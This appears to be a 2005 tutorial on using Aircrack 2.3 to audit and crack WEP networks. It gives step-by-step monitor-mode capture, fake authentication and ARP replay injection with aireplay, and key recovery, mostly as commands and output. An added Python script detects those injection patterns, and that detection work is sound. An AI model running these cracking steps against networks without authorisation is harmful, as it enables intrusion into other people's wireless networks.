Aircrack 2.3 (WEP, WPA-PSK Crack)
11/Nov/2005, tested on SuSE 9.3

Aircrack is a set of tools for auditing wireless networks:
- airodump: 802.11 packet capture program
- aireplay: 802.11 packet injection program
- aircrack: static WEP and WPA-PSK key cracker
- airdecap: decrypts WEP/WPA capture files
Installation
1. Download Aircrack from http://100h.org/wlan/aircrack/
2. Read the documentation (README.html) and follow it. It has the most comprehensive explanation.
3. I have a CISCO Aironet 350 and a PrismGT card (Corega WLCB-54GT), and both work fine. The Aironet 350 works for 11b networks, but aireplay is not supported. The PrismGT card works for 11b/g networks, and both airodump and aireplay work. For the PrismGT card, I needed to compile the driver, but it was not as difficult as expected. I just followed the explanation in the document.
WEP Attack
How to capture (airodump) (WEP)
1. For this example, a PrismGT card is used. It is recognized as eth0, but other cards may be ath0 or something else.
2. Change to monitor mode:
# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
# airmon.sh start eth0
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54
(monitor mode enabled)
3. Search for WLANs. Use 0 to hop between channels.
# airodump eth0 out 0
BSSID PWR Beacons # Data CH MB ENC ESSID
00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD
00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE
BSSID STATION PWR Packets ESSID
00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE
http://www.grape-info.com/doc/linux/config/aircrack-2.3.html (1 of 8) 3/30/2006 2:36:14 PM
4. Press Ctrl+C. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to capture only unique WEP IVs. It saves space.
# airodump eth0 out 1 1
BSSID PWR Beacons # Data CH MB ENC ESSID
00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE
BSSID STATION PWR Packets ESSID
00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE
Fake authentication (aireplay) (WEP)
1. We will use aireplay to inject packets, so we can capture packets easily. Open another console. Copy the BSSID and paste it as follows:
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
If it cannot associate, use the station's MAC:
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
Some access points require the client to reassociate every 20 seconds; otherwise the fake client is considered disconnected. In this case, set up the periodic re-association delay:
# aireplay -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
2. Once associated, send packets as follows. If you are not associated, you will see no packets sent.
# aireplay -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0
Saving APR requests in replay_arp-1112-031550.cap
You must also start airodump to capture replies.
Read 39123 packets (got 1024 APR requests), sent 24543 packets...
3. If it stopped sending, you need to associate again. Consider setting up the periodic re-association delay. I used crontab to re-associate again and again.
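The injection described in these steps is noisy on the air. As an added example that is not part of the original page, this Python script runs two checks a wireless IDS would apply over a constructed list of frame summaries: one WEP IV repeated hundreds of times from a single MAC (the ARP-request replay) and repeated authentication frames from a single MAC (the periodic fake authentication). All frame records and MAC addresses below are constructed.

```python
from collections import defaultdict

# Constructed frame summaries: (time_s, src_mac, frame_kind, wep_iv).
# wep_iv is the 24-bit IV of an encrypted data frame as 6 hex chars, or None.
LEGIT = [(0.1 * i, "00:04:23:52:80:41", "data", f"{0x100000 + i:06x}") for i in range(40)]
INJECTED = [(1.0 + 0.01 * i, "00:01:02:03:04:05", "data", "e3f9a2") for i in range(600)]
REAUTH = [(5.0 + 20.0 * i, "00:01:02:03:04:05", "auth", None) for i in range(4)]
FRAMES = sorted(LEGIT + INJECTED + REAUTH + [(0.0, "00:04:23:52:80:41", "auth", None)],
                key=lambda f: f[0])

def replayed_ivs(frames, min_repeats=50):
    """Sources that transmitted one WEP IV at least min_repeats times.
    A real client picks a fresh IV per frame; hundreds of data frames carrying
    the identical IV from one MAC is the signature of replay injection."""
    seen = defaultdict(lambda: defaultdict(int))
    for _t, src, kind, iv in frames:
        if kind == "data" and iv is not None:
            seen[src][iv] += 1
    return {src: {iv: n for iv, n in ivs.items() if n >= min_repeats}
            for src, ivs in seen.items()
            if any(n >= min_repeats for n in ivs.values())}

def reauth_storms(frames, window_s=60.0, min_auths=3):
    """Sources sending at least min_auths authentication frames inside any
    window_s seconds, the pattern of a periodic fake (re)authentication.
    Returns {src: auth_count_in_first_offending_window}."""
    times = defaultdict(list)
    for t, src, kind, _iv in frames:
        if kind == "auth":
            times[src].append(t)
    flagged = {}
    for src, ts in times.items():
        ts.sort()
        lo = 0
        for hi in range(len(ts)):
            while ts[hi] - ts[lo] > window_s:  # slide the window start forward
                lo += 1
            if hi - lo + 1 >= min_auths:
                flagged[src] = hi - lo + 1
                break
    return flagged

if __name__ == "__main__":
    print("replayed IVs:", replayed_ivs(FRAMES))
    print("re-auth storms:", reauth_storms(FRAMES))
```

Real deployments would feed these functions from a monitor-mode capture parser; the thresholds are starting points to tune against the site's normal client behaviour.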
How to crack (aircrack) (WEP)
1. Open a new console, and type the following command. Aircrack can read the updated file automatically, so you can run airodump and aircrack at the same time.
# aircrack -x -0 out.ivs
2. 104-bit WEP needs about one million IVs. You may need a day or more to capture the packets. However, if you use aireplay to inject, you need only a few hours.
3. This is the result. It needed only a quarter of a million.
4. Aircrack can also run on Windows, but aireplay is not supported.